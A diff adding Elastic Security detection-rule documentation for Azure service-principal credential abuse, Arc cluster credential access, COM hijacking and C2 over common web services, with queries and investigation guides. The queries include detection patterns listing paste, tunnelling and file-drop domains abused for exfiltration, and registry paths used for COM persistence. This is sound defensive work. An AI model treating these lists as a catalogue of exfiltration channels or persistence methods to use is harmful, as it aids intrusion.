b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-authentication-from-multiple-countries.asciidoc new file mode 100644 index 0000000000..5d808bf222 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-authentication-from-multiple-countries.asciidoc @@ -0,0 +1,149 @@ +[[prebuilt-rule-8-19-18-azure-service-principal-authentication-from-multiple-countries]] +=== Azure Service Principal Authentication from Multiple Countries + +Detects when an Azure service principal authenticates from multiple countries within a short time window, which may indicate stolen credentials being used from different geographic locations. Service principals typically authenticate from consistent locations tied to their deployment infrastructure. Authentication from multiple countries in a brief period suggests credential compromise, particularly when the source countries do not align with the organization's expected operating regions. This pattern has been observed in attacks using stolen CI/CD credentials, phished service principal secrets, and compromised automation accounts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 1h + +*Searches indices from*: now-8h ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins +* https://learn.microsoft.com/en-us/entra/identity/conditional-access/workload-identities +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ +* https://www.wiz.io/blog/lateral-movement-risks-in-the-cloud-and-how-to-prevent-them-part-3-from-compromis + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-In Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Service Principal Authentication from Multiple Countries* + + +Service principals are non-interactive identities used for automation and application access. Unlike user accounts, +they rarely change geographic location. Authentication from multiple countries in a short window is a strong indicator +of credential compromise. + + +*Possible investigation steps* + + +- Identify the service principal using the `app_id` and `app_display_name` from the alert. +- Review the list of countries and source IPs — do they match known infrastructure locations? +- Check when the service principal credentials were last rotated — stale credentials are more likely compromised. +- Investigate what resources were accessed after authentication using Azure Activity Logs and Graph Activity Logs. +- Correlate with Azure AD Audit Logs for recent changes to the service principal (new credentials, federated + identities, owner changes). +- Check if the service principal has Azure Arc or Kubernetes-related role assignments, which could indicate + targeting of cluster resources. + + +*False positive analysis* + +- If the service principal is used by a CI/CD pipeline, check if the different countries align with known runner locations. Baseline the expected geographic distribution for that SP. +- If administrators manage the SP, correlate with known travel patterns or VPN usage that could explain multi-country access. + + +*Response and remediation* + + +- Immediately rotate the service principal credentials (secrets and certificates). +- Revoke active sessions and tokens. +- Review and remove any unauthorized role assignments. +- Audit resources accessed from the suspicious locations. +- Enable conditional access policies to restrict service principal authentication by location if supported. + + +==== Rule query + + +[source, js] +---------------------------------- +FROM logs-azure.signinlogs-* metadata _id, _index +| WHERE event.dataset == "azure.signinlogs" + AND azure.signinlogs.category == "ServicePrincipalSignInLogs" + AND azure.signinlogs.properties.status.error_code == 0 + AND source.geo.country_iso_code IS NOT NULL + AND azure.signinlogs.properties.service_principal_id IS NOT NULL + AND NOT azure.signinlogs.properties.app_owner_tenant_id IN ( + "f8cdef31-a31e-4b4a-93e4-5f571e91255a", + "72f988bf-86f1-41af-91ab-2d7cd011db47" + ) + +| EVAL + Esql.source_ip_string = TO_STRING(source.ip), + Esql.source_ip_country_pair = CONCAT(Esql.source_ip_string, " - ", source.geo.country_name) + +| STATS + Esql.source_geo_country_iso_code_count_distinct = COUNT_DISTINCT(source.geo.country_iso_code), + Esql.source_geo_country_name_values = VALUES(source.geo.country_name), + Esql.source_geo_city_name_values = VALUES(source.geo.city_name), + Esql.source_ip_values = VALUES(source.ip), + Esql.source_ip_country_pair_values = VALUES(Esql.source_ip_country_pair), + Esql.source_network_org_name_values = VALUES(`source.as.organization.name`), + Esql.resource_display_name_values = VALUES(azure.signinlogs.properties.resource_display_name), + Esql.app_id_values = VALUES(azure.signinlogs.properties.app_id), + Esql.app_owner_tenant_id_values = VALUES(azure.signinlogs.properties.app_owner_tenant_id), + Esql.source_ip_count_distinct = COUNT_DISTINCT(source.ip), + Esql.source_geo_city_name_count_distinct = COUNT_DISTINCT(source.geo.city_name), + Esql.source_network_org_name_count_distinct = COUNT_DISTINCT(`source.as.organization.name`), + Esql.timestamp_first_seen = MIN(@timestamp), + Esql.timestamp_last_seen = MAX(@timestamp), + Esql.event_count = COUNT(*) + BY azure.signinlogs.properties.service_principal_id, azure.signinlogs.properties.app_display_name + +| WHERE Esql.source_geo_country_iso_code_count_distinct >= 2 +| KEEP * + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-sign-in-followed-by-arc-cluster-credential-access.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-sign-in-followed-by-arc-cluster-credential-access.asciidoc new file mode 100644 index 0000000000..a9a1852658 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-sign-in-followed-by-arc-cluster-credential-access.asciidoc @@ -0,0 +1,136 @@ +[[prebuilt-rule-8-19-18-azure-service-principal-sign-in-followed-by-arc-cluster-credential-access]] +=== Azure Service Principal Sign-In Followed by Arc Cluster Credential Access + +Detects when a service principal authenticates to Microsoft Entra ID and then lists credentials for an Azure Arc-connected Kubernetes cluster within a short time window. The `listClusterUserCredential` action retrieves tokens that enable kubectl access through the Arc Cluster Connect proxy. This sequence (service principal sign-in followed by Arc credential retrieval), represents the exact attack chain used by adversaries with stolen service principal secrets to establish a proxy tunnel into Kubernetes clusters. Service principals that authenticate externally (as opposed to managed identities) and immediately access Arc cluster credentials warrant investigation, particularly when the sign-in originates from an unexpected location or ASN. + +*Rule type*: eql + +*Rule indices*: + +* logs-azure.signinlogs-* +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 15m + +*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect +* https://learn.microsoft.com/en-us/cli/azure/connectedk8s#az-connectedk8s-proxy +* https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins +* https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Azure Arc +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-In Logs +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Service Principal Sign-In Followed by Arc Cluster Credential Access* + + +This rule detects the complete attack entry point for Arc-proxied Kubernetes attacks: a service principal authenticates +to Azure AD, then immediately retrieves Arc cluster credentials. This is the prerequisite sequence before any +Kubernetes-level activity can occur through the Arc proxy. + + +*Possible investigation steps* + + +- Identify the service principal using the `app_id` from the sign-in event and resolve it in Azure AD — is this a + known application? +- Check the sign-in source IP and geolocation — does it match expected infrastructure locations for this SP? +- Review when the SP credentials were last rotated — stale credentials are more likely compromised. +- Check the ASN of the sign-in source — is it from a known cloud provider, corporate network, or unexpected consumer ISP? +- Examine Azure Activity Logs after the credential listing for any Arc-proxied operations (secret/configmap CRUD). +- Correlate with Kubernetes audit logs for operations by the Arc proxy service account + (`system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa`) in the same time window. +- Review Azure AD Audit Logs for recent changes to this SP (new credentials, federated identities, owner changes). + + +*Response and remediation* + + +- Immediately rotate the service principal credentials (secrets and certificates). +- Revoke active sessions and tokens for the SP. +- Review and remove any unauthorized Azure role assignments on Arc-connected clusters. +- Check Kubernetes audit logs for any operations performed through the Arc proxy after credential access. +- Rotate any Kubernetes secrets that may have been accessed through the proxy tunnel. +- Enable conditional access policies to restrict service principal authentication by location if supported. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=30m +[authentication where event.dataset == "azure.signinlogs" + and azure.signinlogs.category == "ServicePrincipalSignInLogs" + and azure.signinlogs.properties.status.error_code == 0 +] by azure.signinlogs.properties.app_id +[any where event.dataset == "azure.activitylogs" + and azure.activitylogs.operation_name : "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/LISTCLUSTERUSERCREDENTIAL/ACTION" + and event.outcome : ("Success", "success") +] by azure.activitylogs.identity.claims.appid + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Container API +** ID: T1552.007 +** Reference URL: https://attack.mitre.org/techniques/T1552/007/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-component-object-model-hijacking.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-component-object-model-hijacking.asciidoc new file mode 100644 index 0000000000..718c9b7d7f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-component-object-model-hijacking.asciidoc @@ -0,0 +1,215 @@ +[[prebuilt-rule-8-19-18-component-object-model-hijacking]] +=== Component Object Model Hijacking + +Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.registry-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 119 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Component Object Model Hijacking* + + +Adversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Retrieve the file referenced in the registry and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + + +*False positive analysis* + + +- Some Microsoft executables will reference the LocalServer32 registry key value for the location of external COM objects. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type == "change" and + /* not necessary but good for filtering privileged installations */ + user.domain != "NT AUTHORITY" and process.executable != null and + ( + ( + registry.path : "HK*\\InprocServer32\\" and + registry.data.strings: ("scrobj.dll", "?:\\*\\scrobj.dll") and + not registry.path : "*\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\*" + ) or + + ( + registry.path : "HKLM\\*\\InProcServer32\\*" and + registry.data.strings : ("*\\Users\\*", "*\\ProgramData\\*") + ) or + + /* in general COM Registry changes on Users Hive is less noisy and worth alerting */ + ( + registry.path : ( + "HKEY_USERS\\*\\InprocServer32\\", + "HKEY_USERS\\*\\LocalServer32\\", + "HKEY_USERS\\*\\DelegateExecute", + "HKEY_USERS\\*\\TreatAs\\", + "HKEY_USERS\\*\\ScriptletURL*", + "HKEY_USERS\\*\\TypeLib*\\Win*" + ) and + not registry.data.strings : ( + /* COM related to Windows Spotlight feature */ + "{4813071a-41ad-44a2-9835-886d2f63ca30}", + + /* AppX/MSIX DelegateExecute handlers: execute, protocol, file */ + "{A56A841F-E974-45C1-8001-7E3F8A085917}", + "{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}", + "{BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78}" + ) + ) + ) and + + not ( + process.code_signature.trusted == true and + process.code_signature.subject_name in ( + "Island Technology Inc.", "Google LLC", "Grammarly, Inc.", "Dropbox, Inc", "REFINITIV US LLC", "HP Inc.", "Adobe Inc.", + "Citrix Systems, Inc.", "Veeam Software Group GmbH", "Zhuhai Kingsoft Office Software Co., Ltd.", "Oracle America, Inc.", + "Brave Software, Inc.", "DeepL SE", "Opera Norway AS", "Thomas Braun", "Slack Technologies, LLC", "Spotify AB", + "Vivaldi Technologies AS" + ) + ) and + + /* excludes Microsoft signed noisy processes */ + not + ( + process.name : ( + "OneDrive.exe", "OneDriveSetup.exe", "FileSyncConfig.exe", "Teams.exe", "MicrosoftEdgeUpdate.exe", "msrdcw.exe", + "MicrosoftEdgeUpdateComRegisterShell64.exe", "setup.exe", "PowerToys.PowerLauncher.exe" + ) and + process.code_signature.trusted == true and process.code_signature.subject_name in ("Microsoft Windows", "Microsoft Corporation") + ) and + + not process.executable : ( + "?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\Program Files\\*.exe", + "?:\\ProgramData\\4Team\\4Team-Updater\\4Team-Updater-Helper.exe", + "?:\\ProgramData\\Lenovo\\Udc\\Hosts\\x64\\MessagingPlugin.exe", + "?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\MsMpEng.exe", + "?:\\Users\\*\\AppData\\Local\\Wondershare\\Wondershare NativePush\\WsToastNotification.exe", + "?:\\Windows\\System32\\DriverStore\\FileRepository\\*.exe", + "?:\\Windows\\System32\\FMToastNotification.exe", + "?:\\Windows\\System32\\msiexec.exe", + "?:\\Windows\\System32\\svchost.exe", + "?:\\Windows\\SysWOW64\\regsvr32.exe", + "?:\\Windows\\System32\\regsvr32.exe", + "\\Device\\Mup\\*\\Kufer\\KuferSQL\\BasysSQL.exe" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Component Object Model Hijacking +** ID: T1546.015 +** Reference URL: https://attack.mitre.org/techniques/T1546/015/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Component Object Model Hijacking +** ID: T1546.015 +** Reference URL: https://attack.mitre.org/techniques/T1546/015/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-connection-to-commonly-abused-web-services.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-connection-to-commonly-abused-web-services.asciidoc new file mode 100644 index 0000000000..bf8ae4f253 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-connection-to-commonly-abused-web-services.asciidoc @@ -0,0 +1,350 @@ +[[prebuilt-rule-8-19-18-connection-to-commonly-abused-web-services]] +=== Connection to Commonly Abused Web Services + +Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.network-* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/security-labs/operation-bleeding-bear +* https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry +* https://specterops.io/blog/2026/01/30/weaponizing-whitelists-an-azure-blob-storage-mythic-c2-profile/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: SentinelOne + +*Version*: 127 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Connection to Commonly Abused Web Services* + + +Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. + +This rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/interactive-investigation-guides.html[Investigate Markdown Plugin] introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. + - !{investigate{"label":"Alerts associated with the user in the last 48h","providers":[[{"excluded":false,"field":"event.kind","queryType":"phrase","value":"signal","valueType":"string"},{"excluded":false,"field":"user.id","queryType":"phrase","value":"{{user.id}}","valueType":"string"}]],"relativeFrom":"now-48h/h","relativeTo":"now"}} + - !{investigate{"label":"Alerts associated with the host in the last 48h","providers":[[{"excluded":false,"field":"event.kind","queryType":"phrase","value":"signal","valueType":"string"},{"excluded":false,"field":"host.name","queryType":"phrase","value":"{{host.name}}","valueType":"string"}]],"relativeFrom":"now-48h/h","relativeTo":"now"}} +- Verify whether the digital signature exists in the executable. +- Identify the operation type (upload, download, tunneling, etc.). +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - !{investigate{"label":"Investigate the Subject Process Network Events","providers":[[{"excluded":false,"field":"event.category","queryType":"phrase","value":"network","valueType":"string"},{"excluded":false,"field":"process.entity_id","queryType":"phrase","value":"{{process.entity_id}}","valueType":"string"}]]}} + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + + +*False positive analysis* + + +- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +network where host.os.type == "windows" and + dns.question.name != null and process.name != null and + not (?user.id in ("S-1-5-18", "S-1-5-19", "S-1-5-20") or user.domain == "NT AUTHORITY") and + /* Add new WebSvc domains here */ + dns.question.name : + ( + "raw.githubusercontent.*", + "pastebin.*", + "paste4btc.com", + "paste.ee", + "ghostbin.com", + "drive.google.com", + "?.docs.live.net", + "api.dropboxapi.*", + "content.dropboxapi.*", + "dl.dropboxusercontent.*", + "api.onedrive.com", + "*.onedrive.org", + "onedrive.live.com", + "filebin.net", + "*.ngrok.io", + "ngrok.com", + "*.portmap.*", + "*serveo.net", + "*localtunnel.me", + "*pagekite.me", + "*localxpose.io", + "*notabug.org", + "rawcdn.githack.*", + "paste.nrecom.net", + "zerobin.net", + "controlc.com", + "requestbin.net", + "slack.com", + "api.slack.com", + "slack-redir.net", + "slack-files.com", + "cdn.discordapp.com", + "discordapp.com", + "discord.com", + "apis.azureedge.net", + "cdn.sql.gg", + "?.top4top.io", + "top4top.io", + "www.uplooder.net", + "*.cdnmegafiles.com", + "transfer.sh", + "gofile.io", + "updates.peer2profit.com", + "api.telegram.org", + "t.me", + "meacz.gq", + "rwrd.org", + "*.publicvm.com", + "*.blogspot.com", + "api.mylnikov.org", + "file.io", + "stackoverflow.com", + "*files.1drv.com", + "api.anonfile.com", + "*hosting-profi.de", + "ipbase.com", + "ipfs.io", + "*up.freeo*.space", + "api.mylnikov.org", + "script.google.com", + "script.googleusercontent.com", + "api.notion.com", + "graph.microsoft.com", + "*.sharepoint.com", + "mbasic.facebook.com", + "login.live.com", + "api.gofile.io", + "api.anonfiles.com", + "api.notion.com", + "api.trello.com", + "gist.githubusercontent.com", + "files.pythonhosted.org", + "g.live.com", + "*.zulipchat.com", + "webhook.site", + "run.mocky.io", + "mockbin.org", + "*googleapis.com", + "global.rel.tunnels.api.visualstudio.com", + "*.devtunnels.ms", + "api.github.com", + "*.blob.core.windows.net", + "*.blob.storage.azure.net", + "files.catbox.moe", + "*.supabase.co", + "*.elastic-cloud.com", + "*.cloud.es.io") and + + /* Insert noisy false positives here */ + not ( + ( + process.executable : ( + "?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\MsMpEng.exe", + "?:\\Users\\*\\AppData\\Local\\BraveSoftware\\*\\Application\\brave.exe", + "?:\\Users\\*\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe", + "?:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe", + "?:\\Users\\*\\AppData\\Local\\Programs\\Opera*\\opera.exe", + "?:\\Users\\*\\AppData\\Local\\Programs\\Fiddler\\Fiddler.exe", + "?:\\Users\\*\\AppData\\Local\\PowerToys\\PowerToys.exe", + "?:\\Users\\*\\AppData\\Local\\Vivaldi\\Application\\vivaldi.exe", + "?:\\Users\\*\\AppData\\Local\\Zen Browser\\zen.exe", + "?:\\Users\\*\\Wavesor Software\\WaveBrowser\\wavebrowser.exe", + "?:\\Windows\\System32\\MicrosoftEdgeCP.exe", + "?:\\Windows\\system32\\mobsync.exe", + "?:\\Windows\\SysWOW64\\mobsync.exe", + "?:\\Windows\\system32\\svchost.exe", + "?:\\Windows\\System32\\smartscreen.exe", + "?:\\Windows\\System32\\wsl.exe", + "?:\\Windows\\System32\\WWAHost.exe" + ) + ) or + + /* Discord App */ + (process.name : "Discord.exe" and (process.code_signature.subject_name : "Discord Inc." and + process.code_signature.trusted == true) and dns.question.name : ("discord.com", "cdn.discordapp.com", "discordapp.com") + ) or + + /* MS Sharepoint / OneDrive */ + (process.name : ("Microsoft.SharePoint.exe", "OneDrive.Sync.Service.exe") and dns.question.name : "onedrive.live.com" and + (process.code_signature.subject_name : "Microsoft Corporation" and process.code_signature.trusted == true) + ) or + + /* Obsidian - Plugins are stored on raw.githubusercontent.com */ + (process.name : "Obsidian.exe" and (process.code_signature.subject_name : "Dynalist Inc" and + process.code_signature.trusted == true) and dns.question.name : "raw.githubusercontent.com" + ) or + + /* WebExperienceHostApp */ + (process.name : "WebExperienceHostApp.exe" and (process.code_signature.subject_name : "Microsoft Windows" and + process.code_signature.trusted == true) and dns.question.name : ("onedrive.live.com", "skyapi.onedrive.live.com") + ) or + + /* IntelliJ IDEA connecting to raw.githubusercontent.com */ + (process.code_signature.subject_name : "JetBrains s.r.o." and + process.code_signature.trusted == true and dns.question.name : ("api.github.com", "raw.githubusercontent.com") + ) or + + (process.code_signature.subject_name : "Microsoft *" and process.code_signature.trusted == true and + dns.question.name : ("*.sharepoint.com", "graph.microsoft.com", "g.live.com", "login.live.com", + "*.blob.core.windows.net", "*.blob.storage.azure.net") + ) or + + (process.code_signature.subject_name : ("Python Software Foundation", "Anaconda, Inc.") and + process.code_signature.trusted == true and dns.question.name : "files.pythonhosted.org" + ) or + + /* Zoom */ + (process.name : "Zoom.exe" and ( + process.code_signature.subject_name : ("Zoom Video Communications, Inc.", "Zoom Communications, Inc.") and + process.code_signature.trusted == true) and dns.question.name : ("www.googleapis.com", "graph.microsoft.com") + ) or + + /* VSCode */ + (process.name : "Code.exe" and (process.code_signature.subject_name : "Microsoft Corporation" and + process.code_signature.trusted == true) and dns.question.name : ("api.github.com", "raw.githubusercontent.com") + ) or + + /* Terraform */ + (process.name : "terraform-provider*.exe" and (process.code_signature.subject_name : "HashiCorp, Inc." and + process.code_signature.trusted == true) and dns.question.name : "graph.microsoft.com" + ) or + + ( + process.code_signature.trusted == true and + process.code_signature.subject_name : ( + "Johannes Schindelin", + "Redis Inc.", + "Slack Technologies, LLC", + "Cisco Systems, Inc.", + "Dropbox, Inc", + "Amazon.com Services LLC", + "Island Technology Inc.", + "GitHub, Inc.", + "Red Hat, Inc", + "Mozilla Corporation" + ) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Web Service +** ID: T1102 +** Reference URL: https://attack.mitre.org/techniques/T1102/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** 